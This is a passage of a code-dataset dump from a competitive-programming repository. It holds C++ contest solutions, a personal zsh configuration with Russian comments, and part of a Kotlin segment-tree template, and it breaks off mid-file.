left, int down, int right, int up)\n{\n int rx = lx + sz * 4;\n int ry = ly + sz * 4;\n //writeln(\"Asking\", left, down, right, up, lx, ly, rx, ry);\n if (points.size() 
== 0 || rx <= left || ry <= down || lx >= right || ly >= up) //No points or we are outside of query \n return {-1, -1};\n //writeln(\"Found points, searching\");\n if (lx >= left && ly >= down && rx <= right && ry <= up) //We are inside in query\n return *points.begin();\n\n pii ans = {-1, -1};\n\n if (points.size() <= R)\n {\n for (const auto& pp: points)\n if (inside(left, down, right, up, -pp.second, pp.first))\n if (ans.first == -1)\n return pp;\n return ans;\n }\n //writeln(\"2 queries\");\n\n auto update = [&](const int& index) {\n if (ii[i][index] == -1)\n return;\n auto a = Q[ii[i][index]].get(left, down, right, up);\n if (a.first != -1)\n {\n if (ans.first != -1)\n ans = min(a, ans);\n else\n ans = a;\n }\n };\n\n update(0);\n update(4);\n update(8);\n update(12);\n if (ans.first == -1)\n {\n update(1);\n update(5);\n update(9);\n update(13);\n }\n if (ans.first == -1)\n {\n update(2);\n update(6);\n update(10);\n update(14);\n }\n if (ans.first == -1)\n {\n update(3);\n update(7);\n update(11);\n update(15);\n }\n return ans;\n}\n\nstruct pair_hash {\n inline long long operator()(const pii& v) const {\n return (v.first << 20) + v.second;\n }\n};\n\n//static const int N = 16;\nvoid run()\n{\n fori(CCC) forj(16) ii[i][j] = -1;\n ints(n, m, k);\n Q[0] = quadro(0, 0, N / 4);\n vector<pii> a(k);\n readln(a);\n unordered_set<pii, pair_hash> p(all(a));\n sort(all(a));\n for (const auto& [x, y]: a)\n //writeln(\"Inserting\", x, y, w), cout.flush(),\n Q[0].insert(x, y);\n\n //fori(w)\n //Q[i].points = set<pii>(all(W[i]));\n\n int ans = 0;\n while (p.size())\n {\n //writeln(\"New iteration\"); cout.flush();\n int l = -1;\n int r = 0;\n int px = 0;\n while (true)\n {\n //writeln(\"Asking\", l, r, N, N);\n auto point = Q[0].get(l, r, N, N);\n if (point.first == -1)\n break;\n auto& [qy, qx] = point; qx *= -1;\n if (qx == n - 1 && qy == 0) --ans;\n //writeln(qx, qy);\n\n int x = qx;\n int y = qy;\n if (y != r)\n px = l + 1;\n while (true)\n {\n auto it = p.find({x, 
y});\n if (it == p.end() || x < px)\n break;\n //writeln(\"Erasing\", x, y);\n p.erase({x, y});\n Q[0].erase(x, y);\n --x;\n }\n px = x + 1;\n //writeln(\"PX\", px);\n l = qx;\n r = qy + 1;\n }\n ans += 2;\n }\n writeln(ans);\n cerr << \"w = \" << w << endl;\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.45644116401672363, "alphanum_fraction": 0.4800741374492645, "avg_line_length": 29.828571319580078, "blob_id": "6a0bb40a2be1220d5c2008dd46165f15a83b6e0d", "content_id": "995cb6c4ccd45f92aa339b78f4ad9d2a945186f7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2158, "license_type": "no_license", "max_line_length": 928, "num_lines": 70, "path": "/2013/2013GCJ1stRoundA/A.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#define enter printf(\"\\n\");\n#define ll unsigned long long\n\nusing namespace std;\nint INF = 1000000007;\nvector<int> 
a;\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n int x;\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nll ss(ll n, ll R)\n{\n ll temp = n * (2 * R + 2 * n - 1);\n return temp;\n}\n\nll test()\n{\n ll R, t, n, l, r, s;\n cin >> R >> t;\n l = 0;\n r = min(1000000000000000001ull / R, 2000000000ull);\n while (true)\n {\n n = (l + r) / 2;\n s = ss(n, R);\n if (s < t)\n l = n; else\n if (s > t)\n r = n; else\n return n;\n if (l + 1 >= r)\n return (ss(r, R) <= t ? 
r : l);\n }\n}\n\nint main()\n{\n freopen(\"input.txt\", \"r\", stdin);\n freopen(\"output.txt\", \"w+\", stdout);\n int T;\n readln(T);\n for (int tttt = 0; tttt < T; tttt++)\n {\n printf(\"Case #%d: \", tttt + 1);\n cout << test() << \"\\n\";\n }\n return 0;\n}\n" }, { "alpha_fraction": 0.5953272581100464, "alphanum_fraction": 0.622733473777771, "avg_line_length": 30.09242057800293, "blob_id": "1f62cfa847cea166b0d382667c5c332cd45850bb", "content_id": "4addf592359fa23585b39c9ce090cab4effeaee8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 19137, "license_type": "no_license", "max_line_length": 629, "num_lines": 541, "path": "/setup/zshrc", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#FONT: monospace regular\nexport LANG=en_US.UTF-8\nexport LC_CTYPE=\"en_US.UTF-8\"\nexport LC_NUMERIC=\"ru_RU.UTF-8\"\nexport LC_TIME=\"ru_RU.UTF-8\"\nexport LC_COLLATE=\"en_US.UTF-8\"\nexport LC_MONETARY=\"en_US.UTF-8\"\nexport LC_MESSAGES=\"en_US.UTF-8\"\nexport LC_PAPER=\"en_US.UTF-8\"\nexport LC_NAME=\"en_US.UTF-8\"\nexport LC_ADDRESS=\"ru_RU.UTF-8\"\nexport LC_TELEPHONE=\"ru_RU.UTF-8\"\nexport LC_MEASUREMENT=\"ru_RU.UTF-8\"\nexport LC_IDENTIFICATION=\"ru_RU.UTF-8\"\n\nexport LANGUAGE=en_US.UTF-8\n\nexport CONSOLEFONT=\"cyr-sun16\"\nexport JAVA_HOME=/usr/lib/jvm/java-11-openjdk\nfpath=(~/.zsh/completion $fpath) \n# Lines configured by zsh-newuser-install\nHISTFILE=~/.histfile\nHISTSIZE=10000\nSAVEHIST=10000\nbindkey -e\n# End of lines configured by zsh-newuser-install\n# The following lines were added by compinstall\nzstyle :compinstall filename '/home/igorjan/.zshrc'\n\nautoload -Uz compinit\ncompinit\n# End of lines added by compinstall\nbindkey '\\e[3~' delete-char # del\nbindkey '\u001b[1;5D' backward-word #ctrl+left \nbindkey '\u001b[1;5C' forward-word #ctrl+right\nbindkey '\u001b[4~' end-of-line\nbindkey '\u001b[1~' beginning-of-line\n\n[[ -n ${key[Home]} ]] && bindkey \"${key[Home]}\" 
beginning-of-line\n[[ -n ${key[End]} ]] && bindkey \"${key[End]}\" end-of-line\n[[ -n ${key[Insert]} ]] && bindkey \"${key[Insert]}\" overwrite-mode\n[[ -n ${key[Delete]} ]] && bindkey \"${key[Delete]}\" delete-char\n[[ -n ${key[Up]} ]] && bindkey \"${key[Up]}\" up-line-or-history\n[[ -n ${key[Down]} ]] && bindkey \"${key[Down]}\" down-line-or-history\n[[ -n ${key[Left]} ]] && bindkey \"${key[Left]}\" backward-char\n[[ -n ${key[Right]} ]] && bindkey \"${key[Right]}\" forward-char\n[[ -n ${key[Backspace]} ]] && bindkey \"${key[Backspace]}\" backward-delete-char\nzmodload -a zsh/stat stat\nzmodload -a zsh/zpty zpty\nzmodload -a zsh/zprof zprof\nzmodload -ap zsh/mapfile mapfile\n\n# Completions \n\nzstyle ':completion:*' group-name ''\nzstyle ':completion:*' matcher-list 'm:{a-z}={A-Z}'\nzstyle ':completion:*' verbose yes\nzstyle ':completion:*:*:(^rm):*:*files' ignored-patterns '*?.o' '*?.c~''*?.old' '*?.pro'\nzstyle ':completion:*:*:-subscript-:*' tag-order indexes parameters\nzstyle ':completion:*:*:kill:*:processes' list-colors \"=(#b) #([0-9]#)*=$color[cyan]=$color[red]\"\nzstyle ':completion:*::::' completer _expand _complete _ignored _approximate\nzstyle ':completion:*:corrections' format '%B%d (errors: %e)%b'\nzstyle ':completion:*:descriptions' format '%B%d%b'\nzstyle ':completion:*:expand:*' tag-order all-expansions\nzstyle ':completion:*:functions' ignored-patterns '_*'\nzstyle ':completion:*:messages' format '%d'\nzstyle ':completion:*:processes' command 'ps -au$USER' \nzstyle ':completion:*:warnings' format 'No matches for: %d'\nzstyle -e ':completion:*:approximate:*' max-errors 'reply=( $(( ($#PREFIX+$#SUFFIX)/3 )) numeric )'\n# менюшку нам для автокомплита \nzstyle ':completion:*' menu yes select\n\n# \n# различные опцие шела \n# \n# Позволяем разворачивать сокращенный ввод, к примеру cd /u/sh в /usr/share \nautoload -U ~/.zsh/completion/*(:t)\nautoload -Uz compinit && compinit\n\n# файл истории команд \nHISTFILE=~/.zhistory\n\n# Число команд, 
сохраняемых в HISTFILE \nSAVEHIST=10000\n\n# Дополнение файла истории \nsetopt APPEND_HISTORY\n\n# Игнорировать все повторения команд \n# setopt HIST_IGNORE_ALL_DUPS\n\n# Игнорировать лишние пробелы \n#setopt HIST_IGNORE_SPACE\n\n# не пищать при дополнении или ошибках \nsetopt NO_BEEP\n\n# если набрали путь к директории без комманды CD, то перейти \nsetopt AUTO_CD\n\n# исправлять неверно набранные комманды \nsetopt CORRECT_ALL\n\n# zsh будет обращаться с пробелами так же, как и bash \nsetopt SH_WORD_SPLIT\n\n# последние комманды в начале файла\nsetopt histexpiredupsfirst\n\n# ещё всякая херь про истоию \nsetopt histignoredups histnostore histverify extended_history share_history\n\n# Установка и снятие различных опций шелла \nsetopt notify globdots correct pushdtohome cdablevars autolist\nsetopt correctall autocd recexact longlistjobs\nsetopt autoresume histignoredups pushdsilent noclobber\nsetopt autopushd pushdminus extendedglob rcquotes mailwarning\nunsetopt bgnice autoparamslash\n\n# Не считать Control+C за выход из оболочки \nsetopt IGNORE_EOF\n\n# автоматическое удаление одинакового из этого массива \ntypeset -U path cdpath fpath manpath\n\n# загружаем список цветов \nautoload colors && colors\n\n# \n# Установка PROMT \n# \n# левый \n# вопрос на автокоррекцию \n#PROMPT='zsh: Заменить '\\''%R'\\'' на '\\''%r'\\'' ? [Yes/No/Abort/Edit] '\n\n# заголовки и прочее. 
\n\nprecmd() {\n [[ -t 1 ]] || return\n\tcase $TERM in\n *xterm*|rxvt|(dt|k|E|a)term*) print -Pn \"\\e]0;[%~] %m\\a\"\t;;\n screen(-bce|.linux)) print -Pn \"\\ek[%~]\\e\\\" && print -Pn \\\"\\e]0;[%~] %m (screen)\\a\" ;;\n\tesac\n}\n\npreexec() {\n\t[[ -t 1 ]] || return\n\tcase $TERM in\n *xterm*|rxvt|(dt|k|E|a)term*) print -Pn \"\\e]0;<$1> [%~] %m\\a\" ;;\n screen(-bce|.linux)) print -Pn \"\\ek<$1> [%~]\\e\\\" && print -Pn \\\"\\e]0;<$1> [%~] %m (screen)\\a\" ;; #заголовок для скрина\n\tesac\n}\ntypeset -g -A key\n\n# \n# экранируем спецсимволы в url, например &, ?, ~ и так далее \nautoload -U url-quote-magic\nzle -N self-insert url-quote-magic\n\n# \n# мои хоткеи \n# \n# дополнение по истории, ^X^Z включить ^Z выключить \nautoload -U predict-on\nzle -N predict-on\nzle -N predict-off\nbindkey -M emacs \"^X^Z\" predict-on\nbindkey -M emacs \"^Z\" predict-off\n\n# peжuм нaвuгaцuu в cтuлe emacs \nbindkey -e\n\n# режим редактирования команды, вызывает для этого то что в $EDITOR \nautoload -U edit-command-line\n\n# Вызов редактора для редактирования строки ввода (хоткей в стиле emacs) \n# bindkey -M vicmd v edit-command-line для командного режима vi \nzle -N edit-command-line\nbindkey -M emacs \"^X^E\" edit-command-line\n\n#завершить слово команду \nbindkey -M emacs \"^N\" complete-word\n\n#вызов диалога удаления файлов в папке \nfunction dialogrun; { rm -rf $(dialog --separate-output --checklist file 100 100 100 $(for l in $(ls -A); do echo \"$l\" \"$(test -d $l && echo \"dir\" || echo \"file\")\" 0; done) --stdout); clear }\nzle -N dialogrun\nbindkey -M emacs \"^X^O\" dialogrun\n\n# куда же мы без калькулятора \nautoload -U zcalc\n\n# \n# мои функции \n# \nccd() { cd && ls}\n\n# создать директорию и перейти в нее \nmcd(){ mkdir -p $1; cd $1 }\n\n# если текущая директория пустая, то удалить ее и перейти в родительскую директорию \nrcd(){ local P=\"`pwd`\"; cd .. 
&& rmdir \"$P\" || cd \"$P\"; }\n\n# быстрое переименование \nname() {\n name=$1\n vared -c -p 'rename to: ' name\n command mv $1 $name\n}\n\n# распаковка архива \nextract () {\n if [ -f $1 ] ; then\n case $1 in\n *.tar.bz2) tar xjf \"$1\" ;;\n *.tar.gz) tar xzf \"$1\" ;;\n *.bz2) bunzip2 \"$1\" ;;\n *.rar) unrar x \"$1\" ;;\n *.gz) gunzip \"$1\" ;;\n *.tar) tar xf \"$1\" ;;\n *.tbz2) tar xjf \"$1\" ;;\n *.tgz) tar xzf \"$1\" ;;\n *.zip) unzip \"$1\" ;;\n *.Z) uncompress \"$1\" ;;\n *.7z) 7z x \"$1\" ;;\n *) echo \"я не в курсе как распаковать '$1'...\" ;;\n esac\n else\n echo \"'$1' is not a valid file\"\n fi\n}\n\n# упаковка в архив \npk () {\n if [ $1 ] ; then\n case $1 in\n tbz) \ttar cjvf \"$2\".tar.bz2 \"$2\" ;;\n tgz) \ttar czvf \"$2\".tar.gz \"$2\" \t;;\n tar) \ttar cpvf \"$2\".tar \"$2\" ;;\n\t\t\tbz2)\tbzip \"$2\" ;;\n gz)\t\tgzip -c -9 -n \"$2\" > \"$2\".gz ;;\n\t\t\tzip) \tzip -r \"$2\".zip \"$2\" ;;\n 7z) \t7z a \"$2\".7z \"$2\" ;;\n *) \techo \"'$1' cannot be packed via pk()\" ;;\n esac\n else\n echo \"'$1' is not a valid file\"\n fi\n}\n\n# mp3 в нормальную кодировку \nmp32utf() { find -iname '*.mp3' -print0 | xargs -0 mid3iconv -eCP1251 --remove-v1 }\n\n# top по имени процесса, правда только по полному \npidtop() {top -p `pidof $@ | tr ' ' ','`}\n\n# простой калькулятор \ncalc() {echo \"${1}\"|bc -l;}\n\n# мой айпишник \nmyip() {lynx --source http://www.formyip.com/ |grep The | awk {'print $5'}}\n\n# великий рандом для перемешивания строк в файле \nrand() { awk '{print rand()\"\\t\"$0}'|sort|awk -F'\\t' '{print $2}' }\n\n# копипаст в консоли \nccopy(){ cp $1 /tmp/ccopy.$1; }\nalias cpaste=\"ls /tmp/ccopy.* | sed 's|/tmp/ccopy.||' | xargs -I % mv /tmp/ccopy.% ./%\"\n\n# \n# переменные окружения и прочая чушь \n# \n# перенаправляем\nREADNULLCMD=${PAGER}\n\n#оформим подсветку в grep \nexport GREP_COLOR=\"1;33\"\n\n# если стоит most то заюзаем в качестве $PAGER \n[[ -x $(whence -p most) ]] && export PAGER=$(whence -p most)\n\n# редактор по дефолту 
\nexport EDITOR=/usr/local/bin/vim\n\nautoload zkbd\n[[ ! -f $HOME/.zkbd/konsole-:0 ]] && zkbd\n[[ -f $HOME/.zkbd/konsole-:0 ]] && source $HOME/.zkbd/konsole-:0\n\n[[ -n ${key[Backspace]} ]] && bindkey \"${key[Backspace]}\" backward-delete-char\n[[ -n ${key[Insert]} ]] && bindkey \"${key[Insert]}\" overwrite-mode\n[[ -n ${key[Home]} ]] && bindkey \"${key[Home]}\" beginning-of-line\n[[ -n ${key[PageUp]} ]] && bindkey \"${key[PageUp]}\" up-line-or-history\n[[ -n ${key[Delete]} ]] && bindkey \"${key[Delete]}\" delete-char\n[[ -n ${key[End]} ]] && bindkey \"${key[End]}\" end-of-line\n[[ -n ${key[PageDown]} ]] && bindkey \"${key[PageDown]}\" down-line-or-history\n[[ -n ${key[Up]} ]] && bindkey \"${key[Up]}\" up-line-or-search\n[[ -n ${key[Left]} ]] && bindkey \"${key[Left]}\" backward-char\n[[ -n ${key[Down]} ]] && bindkey \"${key[Down]}\" down-line-or-search\n[[ -n ${key[Right]} ]] && bindkey \"${key[Right]}\" forward-char\n# пути где искать бинарники \nexport PATH;\n\n\n# ООо и русские имена файлов \nexport OOO_FORCE_DESKTOP=gnome\n\n# забыл зачем ставил \nexport LESSCHARSET=UTF-8\n\n#разукрашиваем ls и автодополнение \nexport LS_COLORS='no=00;37:fi=00;37:di=01;36:ln=04;36:pi=33:so=01;35:do=01;35:bd=33;01:cd=33;01:or=31;01:su=37:sg=30:tw=30:ow=34:st=37:ex=01;31:*.cmd=01;31:*.exe=01;31:*.com=01;31:*.btm=01;31:*.sh=01;31:*.run=01;31:*.tar=33:*.tgz=33:*.arj=33:*.taz=33:*.lzh=33:*.zip=33:*.z=33:*.Z=33:*.gz=33:*.bz2=33:*.deb=33:*.rpm=33:*.jar=33:*.rar=33:*.jpg=32:*.jpeg=32:*.gif=32:*.bmp=32:*.pbm=32:*.pgm=32:*.ppm=32:*.tga=32:*.xbm=32:*.xpm=32:*.tif=32:*.tiff=32:*.png=32:*.mov=34:*.mpg=34:*.mpeg=34:*.avi=34:*.fli=34:*.flv=34:*.3gp=34:*.mp4=34:*.divx=34:*.gl=32:*.dl=32:*.xcf=32:*.xwd=32:*.flac=35:*.mp3=35:*.mpc=35:*.ogg=35:*.wav=35:*.m3u=35:';\nzstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS}\n\n# значение цветов # 30 черный текст # 40 черный фон\n# 00 восстановление цвета по умолчанию # 31 красный текст # 41 красный фон\n# 01 включить яркие цвета # 32 зеленый 
текст # 42 зеленый фон\n# 04 подчеркнутый текст # 33 желтый (или коричневый) текст # 43 желтый (или коричневый) фон\n# 05 мигающий текст # 34 синий текст # 44 синий фон\n# ну или color юзать # 35 фиолетовый текст # 45 фиолетовый фон\n# # 36 cyan текст # 46 cyan фон\n# алиасы # 37 белый (или серый) текст # 47 белый (или серый) фон\n# \n# цветной grep \nalias grep='grep --color=auto'\n\n# более человекочитаемые df и du \nalias df='df -h'\nalias du='du -h'\n\n# переименование-перемещение c пogтвepжgeнueм без коррекции \nalias mv='nocorrect mv -i'\n\n# рекурсивное копирование с подтверждением без коррекции \nalias cp='nocorrect cp -iR'\nalias scp='scp -r'\n\n# удаление с подтверждением без коррекции \nalias rm='nocorrect rm -i'\n\n# принудимтельное удаление без коррекции \nalias rmf='nocorrect rm -f'\n\n# принудительное рекурсивное удаление без коррекции \nalias rmrf='nocorrect rm -fR'\n\n# создание каталогов без коррекции \nalias mkdir='nocorrect mkdir'\n\n# разукрашиваем некоторые команды с помощью grc \n[[ -f /usr/bin/grc ]] && {\n alias ping=\"grc --colour=auto ping\"\n alias traceroute=\"grc --colour=auto traceroute\"\n alias make=\"grc --colour=auto make -s\"\n alias diff=\"grc --colour=auto diff\"\n alias cvs=\"grc --colour=auto cvs\"\n alias netstat=\"grc --colour=auto netstat\"\n}\n\n# разукрашиваем логи с помощью grc \nalias logc=\"grc cat\"\nalias logt=\"grc tail\"\nalias logh=\"grc head\"\n\n# \n# запуск программ \n# \n# везде \nalias py='python'\n\n# в иксах \nalias -s {png,gif,jpg,jpeg}=feh\nalias -s {pdf,djvu}=evince\n\n# без иксов \n[[ -z $DISPLAY ]] && {\n\talias -s {odt,doc,sxw,xls,doc,rtf}=catdoc\n\talias -s {png,gif,jpg,jpeg}=\"fbi -a\"\n\talias -s {pdf,djvu}=evince\n setfont cyr-sun16\n}\n\n# html сам пусть соображает чё запускать \nautoload -U pick-web-browser\nalias -s {html,htm}=pick-web-browser\n\n# \n# глобальные алиасы \n# \nalias -g H=\"| head\"\nalias -g T=\"| tail\"\nalias -g G=\"| grep\"\nalias -g L=\"| less\"\nalias -g M=\"| 
most\"\n#alias -g B=\"&|\"\nalias -g HL=\"--help\"\nalias -g LL=\"2>&1 | less\"\nalias -g CA=\"2>&1 | cat -A\"\nalias -g TABLE=\"| column -t\"\nalias -g NE=\"2> /dev/null\"\nalias -g NUL=\"> /dev/null 2>&1\"\n\n\n# \n# sudo \nalias halt=\"sudo halt\"\nalias reboot=\"sudo reboot\"\nalias gparted=\"sudo gparted\"\n\n# родной скрин \nalias screen=\"screen -DR\"\n\n# ну так привычнее :) \nalias ncmpc=\"ncmpcpp\"\nalias mou=\"mousepad\"\n\n# lastfm \nalias shell-fm=\"shell-fm lastfm://user/tiss93\"\n\n# список удаленных файлов с NTFS, FAT, UFS1/2, FFS, Ext2 и Ext3 \n# пакет sleuthkit, утилита icat для восстановления \nalias fls=\"fls -rd\"\n\n# показываев дерево директорий \nalias dirf='find . -type d | sed -e \"s/[^-][^\\/]*\\// |/g\" -e \"s/|\\([^ ]\\)/|-\\1/\"'\n\n# grep по ps aux \nalias psgrep='ps aux | grep $(echo $1 | sed \"s/^\\(.\\)/[\\1]/g\")'\n\n# удаляем пустые строки и комментарии \nalias delspacecomm=\"sed '/ *#/d; /^ *$/d' $1\"\n\n# \n# команды при запуске zsh \n# \nPROMPT=$'%{\\e[1;32m%}%n %{\\e[1;36m%}{%?} %{\\e[1;37m%}%~'\n\nif [[ $EUID == 0 ]] \nthen\nPROMPT+=$' #%{\\e[0m%} ' # user dir %\nelse\nPROMPT+=$' %#%{\\e[0m%} ' # root dir #\nfi\n\n# Make ^Z toggle between ^Z and fg\nfunction ctrlz() {\n if [[ $#BUFFER == 0 ]]; then\n fg >/dev/null 2>&1 && zle redisplay\n else\n zle push-input\n fi\n}\n\nzle -N ctrlz\nbindkey '^Z' ctrlz\n\nalias ls='ls -Bh\t --color=auto'\nalias l='ls -lhF --group-directories-first --color=auto'\nalias grep='grep --colour=auto'\nexport PATH=\"/home/igorjan/206round/timetable:${PATH}\"\nexport PATH=\"/home/igorjan/206round/staff:${PATH}\"\nexport PATH=\"/home/igorjan/206round/vk200/out:${PATH}\"\nexport PATH=\"/home/igorjan/206round/scripts:${PATH}\"\nexport PATH=\"/home/igorjan/cpt:${PATH}\"\n\n\nalias h='htop'\n\nunsetopt correct_all\nalias show_random_file_or_directory='ls | sed -n \"$((RANDOM%$(ls | wc -l)+1))p\"'\nalias v='/usr/local/bin/vim -p'\nalias vim='/usr/local/bin/vim -p'\nalias fuck='sudo $(fc -ln -1)'\nalias 
x='sudo $(fc -ln -1)'\nalias блядь='sudo $(fc -ln -1)'\nalias nano='vi'\n\ntoBackup() {cp \"$1\" \"$1.backup\"}\nfromBackup() {cp \"$1.backup\" \"$1\"}\nswapBackup() {cp \"$1\" \"$1.backup.temp\"; cp \"$1.backup\" \"$1\"; mv -f \"$1.backup.temp\" \"$1.backup\"}\nalias getstats=\"cat $HISTFILE | grep -E '^:\\s([0-9]+):([0-9]+);(\\w+)(.*)' | sed -r -e 's/^: ([0-9]+):0;(\\w+)(.*)/\\2/g' | sort | uniq -c | sort -n\"\nalias getstatsfull=\"cat $HISTFILE | grep -E '^:\\s([0-9]+):([0-9]+);(\\w+)(.*)' | sed -r -e 's/^: ([0-9]+):0;(\\w+)/\\2/g' | sort | uniq -c | sort -n\"\n\nalias wrc='/usr/local/bin/vim ~/.config/awesome/rc.lua'\nalias vrc='/usr/local/bin/vim ~/.vimrc'\nalias zrc='/usr/local/bin/vim ~/.zshrc'\nalias plugin='/usr/local/bin/vim ~/.vim/bundle/codeforces.vim/autoload'\nalias toPlugin='cd ~/.vim/bundle/codeforces.vim'\nalias cf='cd ~/206round/CodeForce/'\nalias java8='/usr/lib/jvm/java-8-openjdk/bin/java'\nalias sudo='/bin/sudo'\n\nalias pacman='sudo pacman'\nalias :q='exit'\nalias :wq='exit'\n\ncat ~/two_guys.txt\n\nalias notNeededPackages=\"pacman -Qdt | ack '(.*? )' --output '$1'\"\nalias installedPackages=\"pacman -Qet | ack '(.*? )' --output '$1'\"\n\nalias makeTimelapse='ffmpeg -r 8 -y -pattern_type glob -i \"*.JPG\" -pix_fmt yuv420p timelapse.mp4'\n\nsource /usr/share/zsh/plugins/zsh-autosuggestions/zsh-autosuggestions.zsh\nsource /usr/share/zsh/plugins/zsh-syntax-highlighting/zsh-syntax-highlighting.zsh\nsource /usr/share/fzf/completion.zsh\n\nZSH_AUTOSUGGEST_PARTIAL_ACCEPT_WIDGETS+=(forward-char vi-forward-char vi-add-eol)\nZSH_AUTOSUGGEST_ACCEPT_WIDGETS=(end-of-line)\nZSH_HIGHLIGHT_STYLES[path]=none\nZSH_HIGHLIGHT_STYLES[globbing]=none\nZSH_HIGHLIGHT_STYLES[history-expansion]=none\n\ncorrect755 () {\n find * -type d -print0 | xargs -0 chmod 0755\n find . 
-type f -print0 | xargs -0 chmod 0644\n}\n\nalias fix755=correct755\n\ncommand_not_found_handler () {\n if [[ $@ =~ ^[A-Z] ]]; then\n printf \"НЕ ОРИ НА КОНСОЛЬ!!!\\n\"\n else\n printf \"Иди нафиг, я не нашел $@\\n\"\n fi\n return $?\n}\n\ninstall () {\n pacman -S $@ || yaourt -S --noconfirm $@ || yaourt -Ss $@\n}\nalias install=install\nset visualbell\n\nalias removeUnneededPackages=\"pacman -Rns \\$(pacman -Qtdq)\"\n\nsetopt COMPLETE_ALIASES\nzstyle ':completion::complete:*' gain-privileges 1\nzstyle ':completion:*' rehash true\nalias -g ...='../..'\nalias -g ....='../../..'\nalias -g .....='../../../..'\n" }, { "alpha_fraction": 0.46927592158317566, "alphanum_fraction": 0.4892368018627167, "avg_line_length": 26.771739959716797, "blob_id": "022051206403205f1a803bfb967eab5f677f1d24", "content_id": "07646e9a56258adf56fb150631c58a4eb1712c58", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2555, "license_type": "no_license", "max_line_length": 96, "num_lines": 92, "path": "/CodeForce/1170/TemplateSegmentTree.kt", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import java.io.*// {{{\nimport kotlin.math.*\nimport kotlin.collections.*// }}}\n\nprivate fun PrintWriter.readSolveWrite() {\n val (n) = readln()\n val a = readln()\n val (q) = readln()\n build(a, 0, 0, n - 1)\n for (i in 1..q) {\n val (l, r) = readln()\n writeln(get(l, r, n))\n }\n}\n\nprivate fun ok(x: Boolean) = if (x) 1 else 0// {{{\n\nprivate val MAX_N = 500_000\nprivate val t = IntArray(4 * MAX_N + 1)\n\nprivate fun build(a: IntArray, p: Int, tl: Int, tr: Int): Int {\n val x = if (tl == tr) {\n a[tl]\n } else {\n val m = (tl + tr) / 2\n max(\n build(a, 2 * p + 1, tl, m),\n build(a,2 * p + 2, m + 1, tr)\n )\n }\n t[p] = x\n return x\n}\n\nprivate fun get0(p: Int, tl: Int, tr: Int, l: Int, r: Int): Int {\n if (l > r) return -1\n if (l == tl && r == tr) return t[p]\n val m = (tl + tr) / 2\n return max(\n get0(2 * p + 1, tl, m, l, 
min(r, m)),\n get0(2 * p + 2, m + 1, tr, max(l, m + 1), r)\n )\n}\n\nprivate fun get(l: Int, r: Int, n: Int): Int = get0(0, 0, n - 1, l, r)\n\nprivate fun writeln(vararg params: Any) = println(params.joinToString(\" \"))\n\nprivate fun readln() = getIntArray()\n\nprivate fun getIntArray() = readLine()!!.splitToIntArray()\n\nprivate fun bufferOut(block: PrintWriter.() -> Unit) = PrintWriter(System.out).use { block(it) }\n\ndata class Pt(val x: Int, val y: Int, val i: Int, var ans: Int)\n\nfun main() = bufferOut { readSolveWrite() }\n\nprivate fun String.splitToIntArray(): IntArray {\n val n = length\n if (n == 0) return IntArray(0) // EMPTY\n var res = IntArray(4)\n var m = 0\n var i = 0\n while (true) {\n var cur = 0\n var neg = false\n var c = get(i) // expecting number, IOOB if there is no number\n if (c == '-') {\n neg = true\n i++\n c = get(i) // expecting number, IOOB if there is no number\n }\n while (true) {\n val d = c.toInt() - '0'.toInt()\n require(d in 0..9) { \"Unexpected character '$c' at $i\" }\n require(cur >= Integer.MIN_VALUE / 10) { \"Overflow at $i\" }\n cur = cur * 10 - d\n require(cur <= 0) { \"Overflow at $i\" }\n i++\n if (i >= n) break\n c = get(i)\n if (c == ' ') break\n }\n if (m >= res.size) res = res.copyOf(res.size * 